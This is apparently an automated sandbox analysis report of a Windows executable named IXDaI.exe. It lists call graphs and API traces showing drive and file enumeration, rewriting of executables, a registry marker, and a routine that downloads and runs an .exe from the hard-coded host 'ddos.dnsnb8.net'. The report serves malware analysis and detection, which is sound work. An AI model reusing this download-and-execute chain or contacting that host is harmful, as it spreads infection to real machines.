                                                                                      execution_graph 1331 ba6159 1332 ba615f VirtualFree 1331->1332 1339 ba60c7 1332->1339 1333 ba6198 VirtualFree 1341 ba61b2 1333->1341 1334 ba60d5 VirtualAlloc 1334->1339 1335 ba6389 VirtualProtect 1338 ba63b7 1335->1338 1336 ba63fc VirtualProtect 1337 ba6400 1336->1337 1338->1336 1340 ba63e7 VirtualProtect 1338->1340 1339->1332 1339->1333 1339->1334 1340->1336 1340->1338 1341->1335 1342 ba62fb 1341->1342 1014 ba14e1 1015 ba14fd GetModuleHandleA 1014->1015 1016 ba1541 1014->1016 1018 ba151a VirtualQuery 1015->1018 1019 ba1512 1015->1019 1017 ba1573 1016->1017 1020 ba1549 1016->1020 1025 ba1638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1017->1025 1018->1019 1019->1016 1024 ba1566 1020->1024 1042 ba1af9 1020->1042 1022 ba1579 ExitProcess 1026 ba167a 1025->1026 1027 ba167f 1025->1027 1060 ba139f GetVersionExA 1026->1060 1048 ba1718 GetSystemTimeAsFileTime 1027->1048 1030 ba16ca 1031 ba16d0 1030->1031 1032 ba16d7 1030->1032 1081 ba1581 1031->1081 1035 ba170f 1032->1035 1036 ba16dd lstrcpy 1032->1036 1033 ba1686 1033->1030 1037 ba16a0 CreateThread 1033->1037 1035->1022 1036->1022 1053 ba2c48 memset 1037->1053 1297 ba1099 1037->1297 1041 ba1718 3 API calls 1041->1030 1043 ba1b09 1042->1043 1044 ba1b11 1042->1044 1045 ba1638 188 API calls 1043->1045 1046 ba1b16 CreateThread 1044->1046 1047 ba1b0f 1044->1047 1045->1047 1046->1047 1316 ba1638 189 API calls 1046->1316 1047->1024 1047->1047 1049 ba1754 1048->1049 1050 ba1735 SHSetValueA 1048->1050 1051 ba175a SHGetValueA 1049->1051 1052 ba1786 __aulldiv 1049->1052 1050->1052 1051->1052 1052->1033 1087 ba1973 PathFileExistsA 1053->1087 1056 ba2cb2 1058 ba2cbb VirtualFree 1056->1058 1059 ba16ba WaitForSingleObject 1056->1059 1057 ba2c8f CreateThread WaitForMultipleObjects 1057->1056 1109 ba2b8c memset GetLogicalDriveStringsA 1057->1109 1058->1059 1059->1041 1061 ba14da 1060->1061 1062 ba13cf LookupPrivilegeValueA 1060->1062 1061->1027 1063 ba13ef 1062->1063 1064 ba13e7 1062->1064 1063->1061 1282 ba120e GetModuleHandleA GetProcAddress 1063->1282 1277 ba119f GetCurrentProcess OpenProcessToken 1064->1277 1070 ba1448 GetCurrentProcessId 1070->1061 1071 ba1457 1070->1071 1071->1061 1072 ba1319 3 API calls 1071->1072 1073 ba147f 1072->1073 1074 ba1319 3 API calls 1073->1074 1075 ba148e 1074->1075 1075->1061 1076 ba1319 3 API calls 1075->1076 1077 ba14b4 1076->1077 1078 ba1319 3 API calls 1077->1078 1079 ba14c3 1078->1079 1080 ba1319 3 API calls 1079->1080 1080->1061 1296 ba185b GetSystemTimeAsFileTime srand rand srand rand 1081->1296 1083 ba1592 wsprintfA wsprintfA lstrlen CreateFileA 1084 ba15fb WriteFile CloseHandle 1083->1084 1085 ba1633 1083->1085 1084->1085 1086 ba161d ShellExecuteA 1084->1086 1085->1035 1086->1085 1088 ba19a0 1087->1088 1103 ba1ac7 1087->1103 1089 ba19af CreateFileA 1088->1089 1090 ba1a28 GetFileSize 1089->1090 1091 ba19c4 Sleep 1089->1091 1092 ba1a38 1090->1092 1093 ba1a80 1090->1093 1091->1089 1094 ba19d5 1091->1094 1092->1093 1095 ba1a3d VirtualAlloc 1092->1095 1096 ba1a8d FindCloseChangeNotification 1093->1096 1097 ba1a96 1093->1097 1108 ba185b GetSystemTimeAsFileTime srand rand srand rand 1094->1108 1095->1093 1100 ba1a53 1095->1100 1096->1097 1101 ba1a9c DeleteFileA 1097->1101 1102 ba1aad 1097->1102 1099 ba19da wsprintfA CopyFileA 1099->1090 1104 ba1a0d CreateFileA 1099->1104 1100->1093 1105 ba1a59 ReadFile 1100->1105 1101->1102 1102->1103 1107 ba1ab8 VirtualFree 1102->1107 1103->1056 1103->1057 1104->1090 1104->1101 1105->1093 1105->1100 1107->1103 1108->1099 1110 ba2c09 WaitForMultipleObjects 1109->1110 1115 ba2bc8 1109->1115 1112 ba2c2a CreateThread 1110->1112 1113 ba2c3c 1110->1113 1111 ba2bfa lstrlen 1111->1110 1111->1115 1112->1113 1120 ba2845 1112->1120 1114 ba2bd2 GetDriveTypeA 1114->1111 1114->1115 1115->1111 1115->1114 1116 ba2be3 CreateThread 1115->1116 1116->1111 1117 ba2b7d 1116->1117 1130 ba29e2 memset wsprintfA 1117->1130 1267 ba274a memset memset SHGetSpecialFolderPathA wsprintfA 1120->1267 1122 ba2878 DeleteFileA 1124 ba289a 1122->1124 1125 ba288c VirtualFree 1122->1125 1123 ba2853 1123->1122 1126 ba2692 8 API calls 1123->1126 1129 ba239d 186 API calls 1123->1129 1127 ba28ab 1124->1127 1128 ba28a4 CloseHandle 1124->1128 1125->1124 1126->1123 1128->1127 1129->1123 1131 ba2a3a memset lstrlen lstrcpyn strrchr 1130->1131 1132 ba2abc memset memset FindFirstFileA 1130->1132 1131->1132 1133 ba2a88 1131->1133 1144 ba28b8 memset wsprintfA 1132->1144 1133->1132 1135 ba2a9a lstrcmpiA 1133->1135 1137 ba2aad lstrlen 1135->1137 1138 ba2b74 1135->1138 1137->1132 1137->1135 1139 ba2b61 FindNextFileA 1140 ba2b6d FindClose 1139->1140 1141 ba2b23 1139->1141 1140->1138 1142 ba2b35 lstrcmpiA 1141->1142 1143 ba28b8 174 API calls 1141->1143 1142->1140 1142->1141 1143->1139 1145 ba2951 memset 1144->1145 1146 ba2905 1144->1146 1145->1139 1146->1145 1147 ba291b memset wsprintfA 1146->1147 1148 ba2956 strrchr 1146->1148 1149 ba29e2 180 API calls 1147->1149 1148->1145 1150 ba2967 lstrcmpiA 1148->1150 1149->1145 1151 ba297a 1150->1151 1152 ba2988 lstrcmpiA 1150->1152 1162 ba1e6e 1151->1162 1152->1145 1154 ba2994 1152->1154 1155 ba29ad strstr 1154->1155 1156 ba29a5 lstrcpy 1154->1156 1157 ba29cb 1155->1157 1158 ba29d3 1155->1158 1156->1155 1205 ba239d strstr 1157->1205 1227 ba2692 1158->1227 1163 ba1e7d 1162->1163 1236 ba1df6 strrchr 1163->1236 1166 ba2332 1170 ba233d UnmapViewOfFile 1166->1170 1171 ba2346 1166->1171 1167 ba1eb0 SetFileAttributesA CreateFileA 1167->1166 1168 ba1edf 1167->1168 1241 ba1915 1168->1241 1170->1171 1172 ba234b FindCloseChangeNotification 1171->1172 1173 ba2350 1171->1173 1172->1173 1175 ba2391 1173->1175 1176 ba2356 CloseHandle 1173->1176 1175->1145 1176->1175 1177 ba1f2e 1177->1166 1247 ba1c81 1177->1247 1181 ba1f92 1182 ba1c81 2 API calls 1181->1182 1183 ba1f9f 1182->1183 1183->1166 1184 ba1af9 169 API calls 1183->1184 1185 ba2024 1183->1185 1189 ba1fc0 1184->1189 1185->1166 1186 ba1af9 169 API calls 1185->1186 1187 ba207a 1186->1187 1188 ba1af9 169 API calls 1187->1188 1193 ba2090 1188->1193 1189->1166 1189->1185 1190 ba1af9 169 API calls 1189->1190 1191 ba1ffe 1190->1191 1192 ba2013 FlushViewOfFile 1191->1192 1192->1185 1194 ba20bb memset memset 1193->1194 1195 ba20f5 1194->1195 1196 ba1c81 2 API calls 1195->1196 1197 ba21de 1196->1197 1198 ba2226 memcpy UnmapViewOfFile FindCloseChangeNotification 1197->1198 1252 ba1b8a 1198->1252 1200 ba226e 1260 ba185b GetSystemTimeAsFileTime srand rand srand rand 1200->1260 1202 ba22ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1203 ba1915 3 API calls 1202->1203 1204 ba231f CloseHandle 1203->1204 1204->1166 1206 ba2451 CreateFileA GetFileSize 1205->1206 1212 ba23d8 1205->1212 1207 ba2480 1206->1207 1208 ba2675 CloseHandle 1206->1208 1207->1208 1210 ba2499 1207->1210 1209 ba267c RemoveDirectoryA 1208->1209 1211 ba2687 1209->1211 1213 ba1915 3 API calls 1210->1213 1211->1145 1212->1206 1212->1211 1214 ba24a4 9 API calls 1213->1214 1262 ba189d memset CreateProcessA 1214->1262 1217 ba255c Sleep memset wsprintfA 1218 ba29e2 163 API calls 1217->1218 1219 ba2597 memset wsprintfA Sleep 1218->1219 1220 ba189d 6 API calls 1219->1220 1221 ba25e4 Sleep CreateFileA 1220->1221 1222 ba1915 3 API calls 1221->1222 1223 ba2610 CloseHandle 1222->1223 1223->1209 1224 ba261e 1223->1224 1224->1209 1225 ba2641 SetFilePointer WriteFile 1224->1225 1225->1209 1226 ba2667 SetEndOfFile 1225->1226 1226->1209 1228 ba26b2 WaitForSingleObject 1227->1228 1229 ba26a2 CreateEventA 1227->1229 1230 ba2708 1228->1230 1231 ba26c1 lstrlen ??2@YAPAXI 1228->1231 1229->1228 1232 ba2736 SetEvent 1230->1232 1235 ba2718 lstrcpy ??3@YAXPAX 1230->1235 1231->1232 1233 ba26da lstrcpy 1231->1233 1232->1145 1234 ba26f1 1233->1234 1234->1232 1235->1234 1237 ba1e62 1236->1237 1238 ba1e13 lstrcpy strrchr 1236->1238 1237->1166 1237->1167 1238->1237 1239 ba1e40 lstrcmpiA 1238->1239 1239->1237 1240 ba1e52 lstrlen 1239->1240 1240->1237 1240->1239 1242 ba1928 1241->1242 1246 ba1924 SetFilePointer CreateFileMappingA MapViewOfFile 1241->1246 1243 ba192e memset GetFileTime 1242->1243 1244 ba194f 1242->1244 1243->1246 1245 ba1954 SetFileTime 1244->1245 1244->1246 1245->1246 1246->1166 1246->1177 1248 ba1c9c 1247->1248 1249 ba1c94 1247->1249 1248->1249 1250 ba1cae memset memset 1248->1250 1249->1166 1251 ba185b GetSystemTimeAsFileTime srand rand srand rand 1249->1251 1250->1249 1251->1181 1254 ba1b93 1252->1254 1261 ba185b GetSystemTimeAsFileTime srand rand srand rand 1254->1261 1255 ba1bca srand 1256 ba1bd8 rand 1255->1256 1257 ba1c08 1256->1257 1257->1256 1258 ba1c29 memset memcpy lstrcat 1257->1258 1258->1200 1260->1202 1261->1255 1263 ba190c 1262->1263 1264 ba18e0 CloseHandle WaitForSingleObject 1262->1264 1263->1209 1263->1217 1265 ba18fb GetExitCodeProcess 1264->1265 1266 ba1907 CloseHandle 1264->1266 1265->1266 1266->1263 1276 ba185b GetSystemTimeAsFileTime srand rand srand rand 1267->1276 1269 ba27b5 wsprintfA CopyFileA 1270 ba27de wsprintfA 1269->1270 1271 ba2840 1269->1271 1272 ba1973 17 API calls 1270->1272 1271->1123 1273 ba280f 1272->1273 1274 ba2813 DeleteFileA 1273->1274 1275 ba2820 CreateFileA 1273->1275 1274->1275 1275->1271 1276->1269 1278 ba1200 CloseHandle 1277->1278 1279 ba11c6 AdjustTokenPrivileges 1277->1279 1278->1063 1280 ba11f6 1279->1280 1281 ba11f7 CloseHandle 1279->1281 1280->1281 1281->1278 1283 ba123f GetCurrentProcessId OpenProcess 1282->1283 1284 ba1310 1282->1284 1283->1284 1288 ba1262 1283->1288 1284->1061 1291 ba1319 1284->1291 1285 ba12b0 VirtualAlloc 1285->1288 1290 ba12b8 1285->1290 1286 ba12f1 CloseHandle 1286->1284 1287 ba1302 VirtualFree 1286->1287 1287->1284 1288->1285 1288->1286 1289 ba1296 VirtualFree 1288->1289 1288->1290 1289->1285 1290->1286 1292 ba134a 1291->1292 1293 ba132a GetModuleHandleA GetProcAddress 1291->1293 1294 ba1351 memset 1292->1294 1295 ba1363 1292->1295 1293->1292 1293->1295 1294->1295 1295->1061 1295->1070 1296->1083 1298 ba10ba 1297->1298 1299 ba1196 1297->1299 1298->1299 1315 ba185b GetSystemTimeAsFileTime srand rand srand rand 1298->1315 1301 ba1118 wsprintfA wsprintfA URLDownloadToFileA 1302 ba1168 lstrlen Sleep 1301->1302 1303 ba10dc 1301->1303 1302->1298 1306 ba1000 CreateFileA 1303->1306 1307 ba1092 WinExec lstrlen 1306->1307 1308 ba1025 GetFileSize CreateFileMappingA MapViewOfFile 1306->1308 1307->1298 1307->1299 1309 ba107b 1308->1309 1310 ba1057 1308->1310 1313 ba108d CloseHandle 1309->1313 1314 ba1087 CloseHandle 1309->1314 1311 ba1061 1310->1311 1312 ba1074 UnmapViewOfFile 1310->1312 1311->1312 1312->1309 1313->1307 1314->1313 1315->1301 1343 ba2361 1344 ba236b UnmapViewOfFile 1343->1344 1345 ba2374 1343->1345 1344->1345 1346 ba2379 CloseHandle 1345->1346 1347 ba2382 1345->1347 1346->1347 1348 ba2388 CloseHandle 1347->1348 1349 ba2391 1347->1349 1348->1349 1317 ba6076 1318 ba60c7 1317->1318 1319 ba607b 1317->1319 1320 ba615f VirtualFree 1318->1320 1322 ba6198 VirtualFree 1318->1322 1323 ba60d5 VirtualAlloc 1318->1323 1319->1318 1321 ba60b0 VirtualAlloc 1319->1321 1329 ba61b2 1319->1329 1320->1318 1321->1318 1322->1329 1323->1318 1324 ba6389 VirtualProtect 1327 ba63b7 1324->1327 1325 ba63fc VirtualProtect 1326 ba6400 1325->1326 1327->1325 1328 ba63e7 VirtualProtect 1327->1328 1328->1325 1328->1327 1329->1324 1330 ba62fb 1329->1330 1350 ba6014 1351 ba6035 GetModuleHandleA 1350->1351 1352 ba605f 1350->1352 1353 ba604d GetProcAddress 1351->1353 1354 ba6058 1353->1354 1354->1352 1354->1353 1354->1354

                                                                                      Callgraph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      • Opacity -> Relevance
                                                                                      • Disassembly available
                                                                                      callgraph 0 Function_00BA28B8 13 Function_00BA239D 0->13 15 Function_00BA2692 0->15 41 Function_00BA1E6E 0->41 42 Function_00BA29E2 0->42 1 Function_00BA1638 8 Function_00BA1718 1->8 9 Function_00BA1099 1->9 12 Function_00BA139F 1->12 30 Function_00BA1581 1->30 50 Function_00BA17D0 1->50 52 Function_00BA2C48 1->52 2 Function_00BA69B0 3 Function_00BA6834 4 Function_00BA6734 25 Function_00BA6B02 4->25 27 Function_00BA6D00 4->27 31 Function_00BA6A84 4->31 5 Function_00BA65A6 6 Function_00BA67A4 7 Function_00BA2D9B 37 Function_00BA2CF0 8->37 26 Function_00BA1000 9->26 47 Function_00BA185B 9->47 10 Function_00BA1319 11 Function_00BA119F 12->10 12->11 22 Function_00BA120E 12->22 14 Function_00BA189D 13->14 18 Function_00BA1915 13->18 13->42 16 Function_00BA6012 17 Function_00BA6014 19 Function_00BA1D8A 20 Function_00BA1B8A 20->47 21 Function_00BA600A 23 Function_00BA680F 24 Function_00BA2B8C 34 Function_00BA2B7D 24->34 54 Function_00BA2845 24->54 43 Function_00BA6B63 25->43 26->50 27->2 35 Function_00BA6CF2 27->35 27->43 28 Function_00BA6001 28->21 29 Function_00BA1C81 30->47 31->23 31->35 32 Function_00BA6CF8 33 Function_00BA1AF9 33->1 34->42 35->32 36 Function_00BA1973 36->47 38 Function_00BA6076 53 Function_00BA66C8 38->53 39 Function_00BA1DF6 40 Function_00BA1C68 41->7 41->18 41->19 41->20 41->29 41->33 41->39 41->40 44 Function_00BA2D60 41->44 41->47 42->0 43->2 43->3 43->6 45 Function_00BA14E1 45->1 45->33 46 Function_00BA2361 46->7 48 Function_00BA6159 48->53 49 Function_00BA235D 51 Function_00BA274A 51->36 51->47 52->24 52->36 53->25 53->27 53->31 54->13 54->15 54->51

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                                                                      • String ID: %s*$C:\$Documents and Settings
                                                                                      • API String ID: 2826467728-110786608
                                                                                      • Opcode ID: 9a14684858d098d8fa5b4f94cb6e276c647a7c84215983239da6723e266a6db4
                                                                                      • Instruction ID: cace02138ca3db2749071a1a9fca48fa99a2b0ea70f8462768d23f2aa0dc97a2
                                                                                      • Opcode Fuzzy Hash: 9a14684858d098d8fa5b4f94cb6e276c647a7c84215983239da6723e266a6db4
                                                                                      • Instruction Fuzzy Hash: 154167B2408349AFD731DB94DC89EDB77ECEB86715F04086AF944D3111EA35DA4887A1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 172 ba1099-ba10b4 173 ba10ba-ba10c7 172->173 174 ba1199-ba119c 172->174 175 ba10c8-ba10d4 173->175 176 ba10da 175->176 177 ba1184-ba1190 175->177 178 ba1113-ba1162 call ba185b wsprintfA * 2 URLDownloadToFileA 176->178 177->175 179 ba1196-ba1198 177->179 182 ba1168-ba1182 lstrlen Sleep 178->182 183 ba10dc-ba110d call ba1000 WinExec lstrlen 178->183 179->174 182->177 182->178 183->178 183->179
                                                                                      APIs
                                                                                        • Part of subcall function 00BA185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,77068400,http://%s:%d/%s/%s,?,?,?,00BA1118), ref: 00BA1867
                                                                                        • Part of subcall function 00BA185B: srand.MSVCRT ref: 00BA1878
                                                                                        • Part of subcall function 00BA185B: rand.MSVCRT ref: 00BA1880
                                                                                        • Part of subcall function 00BA185B: srand.MSVCRT ref: 00BA1890
                                                                                        • Part of subcall function 00BA185B: rand.MSVCRT ref: 00BA1894
                                                                                      • WinExec.KERNEL32(?,00000005), ref: 00BA10F1
                                                                                      • lstrlen.KERNEL32(00BA4748), ref: 00BA10FA
                                                                                      • wsprintfA.USER32 ref: 00BA112A
                                                                                      • wsprintfA.USER32 ref: 00BA1143
                                                                                      • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00BA115B
                                                                                      • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00BA1169
                                                                                      • Sleep.KERNEL32 ref: 00BA1179
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                                                                      • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                                      • API String ID: 1280626985-1863643174
                                                                                      • Opcode ID: abe9343e243f7bca3044f25bc58270a47b18ea43a50783a75917fc146f0a0040
                                                                                      • Instruction ID: d2fcdd66a72c5c9bd6e34d10f4989b384370754f0068f0f15278dbac60b128a9
                                                                                      • Opcode Fuzzy Hash: abe9343e243f7bca3044f25bc58270a47b18ea43a50783a75917fc146f0a0040
                                                                                      • Instruction Fuzzy Hash: 01217A75908248BEDB609BA4DC4ABAFBBFCEB47715F1144D5E501A3050DBB49B848F60

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 216 ba1718-ba1733 GetSystemTimeAsFileTime 217 ba1754-ba1758 216->217 218 ba1735-ba1752 SHSetValueA 216->218 219 ba17c6-ba17cd 217->219 220 ba175a-ba1784 SHGetValueA 217->220 218->219 220->219 221 ba1786-ba17b3 call ba2cf0 * 2 220->221 221->219 226 ba17b5 221->226 227 ba17bf 226->227 228 ba17b7-ba17bd 226->228 227->219 228->219 228->227
                                                                                      APIs
                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00BA1729
                                                                                      • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00BA174C
                                                                                      • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00BA177C
                                                                                      • __aulldiv.LIBCMT ref: 00BA1796
                                                                                      • __aulldiv.LIBCMT ref: 00BA17A8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: TimeValue__aulldiv$FileSystem
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe$SOFTWARE\GTplus$Time
                                                                                      • API String ID: 541852442-4280275245
                                                                                      • Opcode ID: cf13d2695ce054fe90f6535d36ee6bdb1474c338280260f5b1725ca6b120cc4f
                                                                                      • Instruction ID: c5d275e695e62468f9b7296518a464e4ffa006ef3a790542da9ca43c37eea533
                                                                                      • Opcode Fuzzy Hash: cf13d2695ce054fe90f6535d36ee6bdb1474c338280260f5b1725ca6b120cc4f
                                                                                      • Instruction Fuzzy Hash: DD1146B6A04209BBDB109B98CCC6FEF7BFCEB46F14F108555F901B6140D6719E488B60

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 229 ba6076-ba6079 230 ba607b-ba6080 229->230 231 ba60e0-ba60eb 229->231 233 ba6082-ba6085 230->233 234 ba60f7-ba60f8 230->234 232 ba60ee-ba60f4 231->232 235 ba60f6 232->235 233->235 238 ba6087 233->238 236 ba60fa-ba60fc call ba66c8 234->236 237 ba60fe-ba6106 234->237 235->234 236->237 240 ba6108-ba611d 237->240 241 ba6155-ba6189 VirtualFree 237->241 238->232 242 ba6089-ba6095 238->242 244 ba611f-ba6121 240->244 247 ba618c-ba6192 241->247 245 ba60a1-ba60aa 242->245 246 ba6097-ba609f 242->246 248 ba6123 244->248 249 ba6151-ba6154 244->249 250 ba61ba-ba61c8 245->250 251 ba60b0-ba60c1 VirtualAlloc 245->251 246->245 252 ba6198-ba61b0 VirtualFree 247->252 253 ba60c7-ba60cf 247->253 248->249 256 ba6125-ba6128 248->256 249->241 254 ba61ca-ba61d7 250->254 255 ba6243-ba6251 250->255 251->253 252->250 259 ba61b2-ba61b4 252->259 253->247 263 ba60d5-ba60df VirtualAlloc 253->263 260 ba61dd-ba61e0 254->260 257 ba6253 255->257 258 ba6264-ba626f 255->258 261 ba612a-ba612e 256->261 262 ba6134-ba613b 256->262 264 ba6255-ba6258 257->264 265 ba6271-ba6276 258->265 259->250 260->255 266 ba61e2-ba61f2 260->266 261->262 270 ba6130-ba6132 261->270 269 ba613d-ba614f 262->269 262->270 263->231 264->258 271 ba625a-ba6262 264->271 272 ba6389-ba63b1 VirtualProtect 265->272 273 ba627c-ba6289 265->273 274 ba61f5-ba61fe 266->274 269->244 270->244 271->264 275 ba63b7-ba63ba 272->275 287 ba628b 273->287 288 ba6292-ba6298 273->288 276 ba620c-ba6219 274->276 277 ba6200-ba6203 274->277 279 ba63fc-ba63ff VirtualProtect 275->279 280 ba63bc-ba63c2 275->280 278 ba6238-ba623f 276->278 282 ba621b-ba6228 277->282 283 ba6205-ba6208 277->283 278->274 285 ba6241 278->285 286 ba6400-ba6416 279->286 280->280 284 ba63c4 280->284 282->278 289 ba622a-ba6236 283->289 290 ba620a 283->290 284->279 294 ba63c6-ba63cf 284->294 285->260 292 ba6418-ba641d 286->292 293 ba6420-ba6425 286->293 287->288 291 ba62a2-ba62ac 288->291 289->278 290->278 295 ba62ae 291->295 296 ba62b1-ba62c8 291->296 297 ba63d1 294->297 298 ba63d4-ba63d8 294->298 295->296 299 ba62ce-ba62d4 296->299 300 ba6373-ba6384 296->300 297->298 301 ba63da 298->301 302 ba63dd-ba63e1 298->302 303 ba62da-ba62f1 299->303 304 ba62d6-ba62d9 299->304 300->265 301->302 305 ba63e3 302->305 306 ba63e7-ba63fa VirtualProtect 302->306 308 ba62f3-ba62f9 303->308 309 ba6365-ba636e 303->309 304->303 305->306 306->275 306->279 310 ba62fb-ba630f 308->310 311 ba6314-ba6326 308->311 309->291 312 ba6426-ba64a9 310->312 313 ba6328-ba634a 311->313 314 ba634c-ba6360 311->314 323 ba64ab-ba64c0 312->323 324 ba6519-ba651c 312->324 313->309 314->312 330 ba64c2 323->330 331 ba6535-ba6537 323->331 325 ba651d-ba651e 324->325 326 ba6583-ba6587 324->326 329 ba6522-ba6533 325->329 328 ba6588-ba658b 326->328 334 ba658d-ba658f 328->334 335 ba65a1-ba65a3 328->335 329->331 332 ba64f8 330->332 333 ba64c5-ba64cd 330->333 336 ba659a 331->336 337 ba6539 331->337 343 ba64fa-ba64fe 332->343 344 ba656c-ba656f 332->344 340 ba64cf-ba64d4 333->340 341 ba6542-ba6545 333->341 345 ba6591-ba6593 334->345 342 ba659b-ba659d 336->342 338 ba653b-ba6541 337->338 339 ba65b4 337->339 338->341 350 ba65be-ba6608 339->350 346 ba64d6-ba64d9 340->346 347 ba6517-ba6518 340->347 348 ba654d-ba6550 341->348 342->345 349 ba659f 342->349 351 ba6572 343->351 352 ba6500 343->352 344->351 345->342 353 ba6595 345->353 346->348 354 ba64db-ba64f5 346->354 347->324 348->350 355 ba6552-ba6556 348->355 349->328 356 ba6573-ba6576 351->356 352->329 357 ba6502 352->357 353->336 354->332 359 ba6578-ba657f 355->359 360 ba6558-ba6569 355->360 356->359 357->356 361 ba6504-ba6513 357->361 359->326 360->344 361->331 363 ba6515 361->363 363->347
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00BA60BE
                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00BA60DF
                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00BA6189
                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00BA61A5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$AllocFree
                                                                                      • String ID:
                                                                                      • API String ID: 2087232378-0
                                                                                      • Opcode ID: a4dd1f661a300c8e830e962431ad13c36e02b0d4b856efa0dea42d0a3fb9ae3a
                                                                                      • Instruction ID: af2f4d19a173cf21b6caff00c352213616390014974c690ee44bcd35000042fc
                                                                                      • Opcode Fuzzy Hash: a4dd1f661a300c8e830e962431ad13c36e02b0d4b856efa0dea42d0a3fb9ae3a
                                                                                      • Instruction Fuzzy Hash: FC1211B250C7898FDB328F64CC95BEA7BE0EF13310F1C45AED9898B292D674A901C755

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 365 ba2b8c-ba2bc6 memset GetLogicalDriveStringsA 366 ba2bc8-ba2bcc 365->366 367 ba2c09-ba2c28 WaitForMultipleObjects 365->367 368 ba2bfa-ba2c07 lstrlen 366->368 369 ba2bce-ba2bd0 366->369 370 ba2c2a-ba2c3a CreateThread 367->370 371 ba2c3c-ba2c45 367->371 368->366 368->367 369->368 372 ba2bd2-ba2bdc GetDriveTypeA 369->372 370->371 372->368 373 ba2bde-ba2be1 372->373 373->368 374 ba2be3-ba2bf6 CreateThread 373->374 374->368
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00BA2BA6
                                                                                      • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00BA2BB4
                                                                                      • GetDriveTypeA.KERNEL32(?), ref: 00BA2BD3
